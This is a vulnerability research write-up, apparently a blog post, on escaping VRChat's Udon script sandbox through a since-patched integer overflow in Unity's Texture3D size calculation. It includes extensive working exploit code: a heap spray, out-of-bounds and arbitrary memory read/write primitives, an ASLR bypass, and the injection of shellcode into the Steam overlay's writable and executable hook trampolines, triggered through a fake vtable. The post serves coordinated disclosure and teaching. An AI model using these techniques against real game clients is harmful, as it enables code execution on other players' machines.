Breaking out of VRChat using a Unity bug

This vulnerability is patched in VRChat 2024.3.1p4 and Unity 6000.0.20f1, 2022.3.48f1 and 2021.3.44f1.

THIS DOESN'T MEAN THAT OTHER UNITY GAMES ARE VULNERABLE! Exploiting the bug requires far more user control than the vast majority of other games allow.

VRChat is a fairly popular game that heavily revolves around user-generated content. It's well known for letting users express themselves by creating and uploading their own worlds and avatars for everyone to enjoy. As great (or terrifying, depending on how long you've been on the internet) as that sounds, letting users upload mostly whatever they want in such a free environment also exposes a massive attack surface for software vulnerabilities.

Specifically, I want to focus on VRChat's scripting language, Udon. Udon is a custom bytecode virtual machine used for scripting worlds, and scripts for it can be written either with the Udon Node Graph or with UdonSharp. As the name suggests, the Udon Node Graph is a graphical node-based environment driven by connecting inputs and outputs together with lines, while UdonSharp compiles scripts written in C# directly to Udon bytecode. Here, I'll be using UdonSharp because I think it's significantly less painful to work with than the graphical editor.

The best part about Udon is that it not only exposes its own APIs, but it also allows the user to use a limited subset of Unity's APIs and the C# standard library. Combined with UdonSharp, this makes writing Udon scripts relatively painless for those who already know how to write C# code for Unity, while still sandboxing untrusted user scripts.

using System;
using UdonSharp;
using UnityEngine;
using VRC.SDKBase;
using VRC.Udon;

public class Cube : UdonSharpBehaviour
{
    public override void Interact()
    {
        Debug.Log("Stop poking me!!!");
    }
}

As long as no potentially dangerous APIs like process creation are exposed to Udon, it shouldn't be able to escape its sandbox, right?

You're reading this post, so obviously, there's more to it. Like every other program, Unity isn't perfectly written. Many of its sanity checks are there to make sure gamedevs don't accidentally blow their feet off, not to defend against malicious users. Although Udon doesn't expose everything, there's still a fairly large surface area to sift through. Let's take a closer look at one particular piece of the engine.

Unity's Textures

Unity's texture classes expose direct access to texture data on the CPU and handle uploading it to the GPU. This is useful for dynamically creating and modifying textures without render targets or shaders, like so:

// Create a new 128x128 RGBA32 texture with no mipmaps
Texture2D texture = new Texture2D(128, 128, TextureFormat.RGBA32, false);

// Fill it with a basic XOR pattern
// Not the most efficient way to do it, but this is just an example
for (int y = 0; y < 128; y++)
{
    for (int x = 0; x < 128; x++)
    {
        // SetPixel takes a float color normalized from 0 to 1
        float val = (float)(x ^ y) / 0xFF;
        texture.SetPixel(x, y, new Color(val, val, val, 1.0f));
    }
}

// Upload it to the GPU
texture.Apply();

// Put the texture on the cube
Renderer renderer = GetComponent<Renderer>();
renderer.material.mainTexture = texture;

Unity's Texture2D class caps out at a resolution of 16384px on each axis, which matches the maximum texture size of most modern PC graphics cards. With the RGBA32 texture format, where each of the four channels is stored as a byte, that works out to a maximum in-memory size of 16384 * 16384 * 4 = 1073741824 bytes (1 GB). (Technically this could be higher with other pixel formats, but RGBA32 is the easiest one to work with.)

We can go beyond 2D, too. There's also a Texture3D class, which, as the name suggests, exposes a texture with three dimensions instead of two. How exciting. Unlike the 2D version, this type of texture has a per-axis resolution limit of 2048. While that doesn't sound like much, it adds up to an absurd amount of memory: 2048 * 2048 * 2048 * 4 = 34359738368 bytes (32 GB!!!)
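For anyone who wants to double-check the math, here's the same arithmetic as a quick C# snippet (just an illustration, not exploit code):

// RGBA32 is 4 bytes per pixel
long max2D = 16384L * 16384L * 4;       // 1,073,741,824 bytes (1 GB)
long max3D = 2048L * 2048L * 2048L * 4; // 34,359,738,368 bytes (32 GB)
Debug.Log($"2D max: {max2D} bytes, 3D max: {max3D} bytes");

Both values fit comfortably in a 64-bit integer; keep the 32-bit limit (4294967295) in mind for the next part.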

Because I could make textures that massive, I wanted to know what would happen if I allocated a texture that had a size just over the 32-bit unsigned integer limit. This might cause some strange behavior if Unity decides to store the texture size as a 32-bit integer somewhere, but assuming that everything is working properly, it should either allocate the whole thing or refuse to make a texture that large. Let's give it a shot:

// Create a new 2048*2048*256 RGBA32 texture with no mipmaps
// 2048 * 2048 * 256 * 4 = 4294967296 or 0x1_0000_0000
Texture3D texture = new Texture3D(2048, 2048, 256, TextureFormat.RGBA32, false);

// If we get to this point without throwing an exception, then it worked
Debug.Log("Texture created successfully");

Alright, looks like Unity's happy with the texture!

...but my memory usage didn't go up after creating the texture. Hmmm...

Maybe some weird lazy allocation stuff is happening? Let's try writing a bunch of pixels to it to see if that does anything:

// This loop will write bytes spelling out "ABCD" in ASCII contiguously to the start of the texture
// 3D textures are laid out in this order: x, y, z
// Think of it like a z-sized array of 2D x by y textures
// Remember that GetPixel/SetPixel take normalized float colors, but they will be converted to RGBA32
Color col = new Color('A' / 255.0f, 'B' / 255.0f, 'C' / 255.0f, 'D' / 255.0f);
for (int i = 0; i < 0x1000000; i++)
    texture.SetPixel(i % 2048, i / 2048 % 2048, i / 2048 / 2048, col);

...aaaaand that nuked the heap and crashed the game. (check the register values!)

The Bug

NOTE: If you want to play along at home or are interested in doing your own reverse engineering work, Unity has a public symbol store that provides PDBs with symbol names for most Windows Unity builds. Although the specific build VRChat used at the time doesn't appear to be on there, 2022.3.22f1 is close to it and is more than enough for reverse engineering.

When creating a 3D texture (see Texture3D::InitTexture), Unity passes the texture's dimensions, format, and mipmap count into a function called ComputeTextureSize.

Notice that explicit texture size check? Not only that, but according to the disassembly, ComputeTextureSize should be returning an unsigned 64-bit integer, which should easily fit the real size of the texture with no problem. What's up with that?

ComputeTextureSize loops over every mipmap level of the texture and calculates the size for each level. I won't go into full detail on how this function works because most of it is irrelevant, but the important part is here:

The function calculates the size of each level as a signed 32-bit integer, then sign-extends the result to 64 bits before adding it to the total texture size. For textures between 2GB and 4GB this happens to work out, since the sign extension produces a massive unsigned 64-bit value that still fails the caller's size check.

However, sizes of 4GB and beyond wrap around due to overflow. That means that for a 4GB texture with no mipmaps, ComputeTextureSize returns 0, bypassing the size check. The miscalculated size also gets used to allocate the texture buffer, leading to a trivial out-of-bounds heap read/write primitive with a controlled offset via the pixel getters and setters.
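To make the arithmetic concrete, here's a minimal C# sketch of the miscalculation (Unity's actual code is C++; this is just an illustration of the same 32-bit math):

// The per-level size ends up being computed in signed 32-bit arithmetic
int width = 2048, height = 2048, depth = 256, bytesPerPixel = 4;

// 2048 * 2048 * 256 * 4 = 0x1_0000_0000, which doesn't fit in 32 bits and silently wraps to 0
int levelSize = width * height * depth * bytesPerPixel;

// Sign-extending the already-wrapped value to 64 bits can't recover the real size
long totalSize = levelSize;

Debug.Log($"computed size: {totalSize}"); // 0, so the "texture too large" check never fires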

Now, with that out of the way, it's finally time to write a full exploit!

From Out-of-Bounds to Everywhere

While an out-of-bounds heap read/write within 4GB of the broken allocation is great and all, it'd be nicer to be able to access memory at any address. To do this, I'll use the OOB texture to overwrite the data pointer of another texture object, then use that texture to read/write memory at that address.

First, a couple of helper functions to make dealing with the OOB memory primitive easier:

// Will be initialized later
private Texture3D oob = null;

private uint read32Rel(int offset)
{
    if (offset % 4 != 0)
    {
        // UdonSharp doesn't want to compile exceptions, so this will have to do
        Debug.LogError($"read32Rel: Offset {offset} must be aligned!!!");
        return 0x41414141;
    }

    int coord = offset / 4;
    var pixel = oob.GetPixel(coord % 2048, coord / 2048 % 2048, coord / 2048 / 2048);
    return ((uint)(pixel[3] * 0xFF) << 24) | ((uint)(pixel[2] * 0xFF) << 16) | ((uint)(pixel[1] * 0xFF) << 8) | (uint)(pixel[0] * 0xFF);
}

private void write32Rel(int offset, uint data)
{
    if (offset % 4 != 0)
    {
        Debug.LogError($"write32Rel: Offset {offset} must be aligned!!!");
        return;
    }

    int coord = offset / 4;
    Color pixel = new Color((data & 0xFF) / 255.0f, ((data >> 8) & 0xFF) / 255.0f, ((data >> 16) & 0xFF) / 255.0f, ((data >> 24) & 0xFF) / 255.0f);
    oob.SetPixel(coord % 2048, coord / 2048 % 2048, coord / 2048 / 2048, pixel);
}
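As a quick example of how these helpers get used (hypothetical debugging code, not part of the final exploit), two 32-bit reads can be stitched together to dump the memory right past the undersized allocation:

// Hex-dump the first 64 bytes of adjacent heap memory, 8 bytes at a time
for (int off = 0; off < 0x40; off += 8)
{
    ulong qword = ((ulong)read32Rel(off + 4) << 32) | read32Rel(off);
    Debug.Log($"oob+0x{off:X2}: 0x{qword:X16}");
}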

In order to modify another object using the OOB texture, that object has to be allocated right after the OOB texture's data on the heap.

Thankfully, Unity uses a custom heap allocator based on tlsf that's very easy to manipulate. All I have to do is allocate a bunch of similarly sized objects to fill the free holes in the heap before creating the main OOB texture, which should place its allocation at the end of the heap. Then, any new allocations should be accessible from the OOB read/write primitive.

private Texture3D[] spray1 = new Texture3D[16384];
private Texture3D[] spray2 = new Texture3D[1024];

// Try to fill any holes in the heap
// Better to have the spray objects be exactly the same size as the OOB texture
// These are stored in an array to prevent them from being unexpectedly garbage collected
for (int i = 0; i < spray1.Length; i++)
{
    var temp = new Texture3D(2048, 2048, 256, TextureFormat.RGBA32, false, false);
    spray1[i] = temp;
}

// Set up OOB read/write texture
oob = new Texture3D(2048, 2048, 256, TextureFormat.RGBA32, false, false);
Debug.Log("oob texture created successfully");

// Spray Texture3Ds to eventually turn one of them into an arbitrary read/write primitive
// They're more convenient than Texture2D because they don't have an extra layer of indirection for the data pointer
for (int i = 0; i < spray2.Length; i++)
{
    var temp = new Texture3D(1, 1, 1, TextureFormat.RGBA32, false, false);
    spray2[i] = temp;
}

Once that's done, I can search for and modify one of the sprayed dummy textures in OOB memory, giving me both a C# reference to the object and access to its raw memory. The object search also doubles as a way to find UnityPlayer.dll's base address in order to defeat ASLR.

private const uint TEX3D_VTBL_RVA = 0x197D288;
private ulong unityPlayerBase = 0;
private int arbTexOffset = -1;      // arbTex's offset relative to the OOB texture
private Texture3D arbTex = null;

// Try to find one of the sprayed Texture3Ds
for (int i = 0; i < 4096; i += 8)
{
    // All 64-bit modules with ASLR have the top 24 bits of their base set to 0x00007F
    // In order to check if the leaked pointer is Texture3D's vtable,
    // the expected relative address gets subtracted and the result has to be page-aligned
    ulong leak = ((ulong)read32Rel(i + 4) << 32) | read32Rel(i);
    if (((leak >> 40) & 0xFFFFFF) == 0x7F && ((leak - TEX3D_VTBL_RVA) & 0xFFF) == 0)
    {
        Debug.Log($"found texture3d at oob rel 0x{i:X}");
        unityPlayerBase = leak - TEX3D_VTBL_RVA;
        arbTexOffset = i;
        break;
    }
}
if (arbTexOffset == -1)
{
    Debug.LogError("failed to find texture3d to corrupt");
    return;
}

// Modify its width and try to find the object in the spray2 array
// In testing, the initial heap spray worked so well that the corrupted texture was always spray2[0]
// Still, better safe than sorry!
write32Rel(arbTexOffset + 0x118, 2);
for (int i = 0; i < spray2.Length; i++)
{
    if (spray2[i].width == 2)
    {
        Debug.Log($"found corrupted texture3d! spray2[0x{i:X}] with width {spray2[i].width}");
        arbTex = spray2[i];
        break;
    }
}
if (arbTex == null)
{
    Debug.LogError("failed to find corrupted texture3d");
    return;
}

With that done, I can construct an arbitrary read/write primitive by overwriting the data pointer. Since the target texture is now a 2x1x1 RGBA32 texture, I can read/write 64 bits at a time, which is exactly what's needed for the rest of the exploit setup.

private ulong read64(ulong addr)
{
    // Overwrite the texture data pointer
    write32Rel(arbTexOffset + 0x128, (uint)(addr & 0xFFFFFFFF));
    write32Rel(arbTexOffset + 0x12C, (uint)(addr >> 32));

    var data = arbTex.GetPixels32();

    return data[0][0] |
            ((ulong)data[0][1] << 8) |
            ((ulong)data[0][2] << 16) |
            ((ulong)data[0][3] << 24) |
            ((ulong)data[1][0] << 32) |
            ((ulong)data[1][1] << 40) |
            ((ulong)data[1][2] << 48) |
            ((ulong)data[1][3] << 56);
}

private void write64(ulong addr, ulong val)
{
    write32Rel(arbTexOffset + 0x128, (uint)(addr & 0xFFFFFFFF));
    write32Rel(arbTexOffset + 0x12C, (uint)(addr >> 32));

    var data = new Color32[2]
    {
        new Color32((byte)(val & 0xFF), (byte)((val >> 8) & 0xFF), (byte)((val >> 16) & 0xFF), (byte)((val >> 24) & 0xFF)),
        new Color32((byte)((val >> 32) & 0xFF), (byte)((val >> 40) & 0xFF), (byte)((val >> 48) & 0xFF), (byte)((val >> 56) & 0xFF)),
    };

    arbTex.SetPixels32(data);
}
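As a sanity check (again, hypothetical debugging code), reading the very start of UnityPlayer.dll with the new primitive should give back a PE DOS header, which always begins with the "MZ" magic:

// The low 16 bits of the first qword at the module base should be 0x5A4D ("MZ")
ulong dosHeader = read64(unityPlayerBase);
Debug.Log($"UnityPlayer.dll base qword: 0x{dosHeader:X16}");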

Finally, I can use these primitives to set up a ROP chain and overwrite the target texture's vtable to pivot the stack and run shellcode.

...

...

Despite UnityPlayer.dll being a relatively large binary with plenty of ROP gadgets, I still don't really want to write a ROP chain if I don't have to. It would be nice if I had some convenient writable and executable memory to drop my shellcode into instead of having to write yet another VirtualAlloc/VirtualProtect ROP chain. (Un)fortunately, VRChat uses IL2CPP, which means all of the game's C# code is precompiled and there's no JIT leaving executable memory lying around.

Still, it can't hurt to check, right?

Why ROP When You Have Steam

Like most modern PC games, VRChat is on Steam, which has an in-game overlay accessible by pressing Shift+Tab. In order to work on almost every game without explicit integration from the original developers, the overlay DLL (GameOverlayRenderer64.dll) has to hook a few functions to intercept things such as input. For some reason, it seems like Valve decided to write their own hooking library. The anatomy of a hooked function looks something like this:

The trampoline region is allocated within 2GB of the hooked function and exists because of an x86_64 limitation. Hooks usually want to overwrite as few instructions as possible in order to avoid issues, so a 5-byte jump is used for the initial hook jump.

However, that only leaves 4 bytes for a signed relative offset, and the destination in GameOverlayRenderer64.dll is usually more than 2GB away, which is why the hook has to "bounce" off of the trampoline region to reach it via a larger jump (a 6-byte instruction followed by an 8-byte pointer). The trampoline also stores the instructions that the initial jump overwrote so the hook can still call the original function.
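To make the jump math concrete, here's a worked example with made-up addresses (these aren't the real ones from the screenshot):

// Addresses are made up for illustration
ulong hookedFunc = 0x00007FFB12340000; // where the 5-byte "jmp rel32" (E9 xx xx xx xx) gets written
ulong bounceStub = 0x00007FFB10000000; // trampoline region allocated within 2GB of the function

// rel32 is relative to the end of the 5-byte instruction
long rel32 = (long)bounceStub - (long)(hookedFunc + 5); // -36962309, fits in 32 bits
Debug.Log($"jmp rel32 = {rel32}");

// The trampoline then uses the larger 6-byte-instruction + 8-byte-pointer jump,
// which can reach GameOverlayRenderer64.dll anywhere in the 64-bit address space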

For some reason, Valve made the "interesting" design decision of making that trampoline region readable, writable, and executable at all times. This effectively turns these regions into free "Get Out of ROP Free" cards that exist on every 64-bit Steam game as long as the overlay is enabled.

UPDATE (2024/11/23): GameOverlayRenderer64.dll still installs its hooks regardless of whether the overlay or Steam Input are enabled, as long as the game was launched through Steam or it initializes the Steam API. Thanks Emma!

The screenshot also shows one of these trampoline regions being allocated for xinput1_3.dll, a DLL notorious for not having ASLR enabled for some reason. For this exploit, I didn't want to rely on that region always being at the same address, because it's entirely possible that something else could take up that part of the address space before XInput gets loaded or the hook gets installed. Besides, I didn't want this exploit chain to be that easy.

Instead, I opted to get one of the hooked functions from UnityPlayer.dll's import address table and read the jump instruction for the hook (jmp hook_entry) in order to find one of these magic RWX regions. This has the benefit of being able to check if the overlay is actually loaded before trying to write any shellcode instead of taking a leap of faith and blindly writing to a RWX region that may or may not be there. From here, code execution is trivial and the exploit is complete.

private const uint LOADLIBRARYEXW_RVA = 0x185F658;
private const uint GETMODULEHANDLEA_RVA = 0x185F6E8;
private const uint GETPROCADDRESS_RVA = 0x185F7D0;
private const uint SCRATCH_RVA = 0x1BF00B0; // Can be any random part of .data

// Get LoadLibraryExW's address from UnityPlayer.dll's IAT
ulong hook_addr = read64(unityPlayerBase + LOADLIBRARYEXW_RVA);

// Find one of GameOverlayRenderer64's RWX trampoline regions using the hook jump
ulong hook = read64(hook_addr);
if ((hook & 0xFF) != 0xE9)
{
    Debug.LogError("LoadLibraryExW isn't hooked by GameOverlayRenderer64");
    return;
}
ulong offset = (hook >> 8) & 0xFFFFFFFF;
ulong target = hook_addr + offset + 5;
if ((offset & 0x80000000) != 0)
    target -= 0x100000000; // UdonSharp doesn't support unchecked signed <-> unsigned conversion and it's REALLY ANNOYING

// Write shellcode to the RWX region
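// (shellcode is a ulong[] holding the payload in 8-byte chunks; its contents are omitted here)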
for (int i = 0; i < shellcode.Length; i++)
{
    // Replace placeholder values with addresses known at runtime
    ulong val = shellcode[i];
    if (val == 0x4141414141414141)
        val = read64(unityPlayerBase + GETMODULEHANDLEA_RVA);
    else if (val == 0x4242424242424242)
        val = read64(unityPlayerBase + GETPROCADDRESS_RVA);
    write64(target + (ulong)i * 8, val);
}

// Put a fake vtable somewhere
// This points Texture3D::MainThreadCleanup to the shellcode
write64(unityPlayerBase + SCRATCH_RVA + 8, target);

// Overwrite the arbitrary r/w texture's vtable pointer
write32Rel(arbTexOffset, (uint)((unityPlayerBase + SCRATCH_RVA) & 0xFFFFFFFF));
write32Rel(arbTexOffset + 4, (uint)((unityPlayerBase + SCRATCH_RVA) >> 32));

// Call MainThreadCleanup by destroying the texture and run the shellcode!
Destroy(arbTex);

(as for the title of the video, this really wasn't the first time I did this, but that writeup is lost to time...)

To Udon devs: This exploit was why this regression happened. A check was added for the texture constructors to make sure the size wouldn't overflow, but not every format was handled in the check. Sorry about that :(

Honorable Mention

This wasn't something I used in the final exploit, but I thought it was worth mentioning. While experimenting with large texture sizes, I noticed an interesting parameter in Texture2D's constructor:

Then I checked what was exposed in Udon:

And I gave it a shot:

Yes, this really did allow reading uninitialized heap memory via intended Unity behavior. Thankfully, I didn't see any other obvious API whitelist oversights like this. Although these constructors are still exposed in the latest version, they now throw an exception if createUninitialized is enabled.
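For illustration, the experiment boils down to just a few lines; this is a sketch assuming the Texture2D overload with the createUninitialized parameter (which, as mentioned, now throws on patched versions):

// Ask Unity for a texture whose CPU-side buffer is intentionally left uninitialized
Texture2D leaky = new Texture2D(256, 256, TextureFormat.RGBA32, false, false, true);

// With no SetPixel/Apply in between, this just returns whatever bytes were already
// sitting in the freshly allocated heap memory
Color32[] leaked = leaky.GetPixels32();
Debug.Log($"first leaked 'pixel': {leaked[0]}");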

Thanks to Tupper, the rest of the VRChat team, and Unity for their cooperation in getting these vulnerabilities fixed.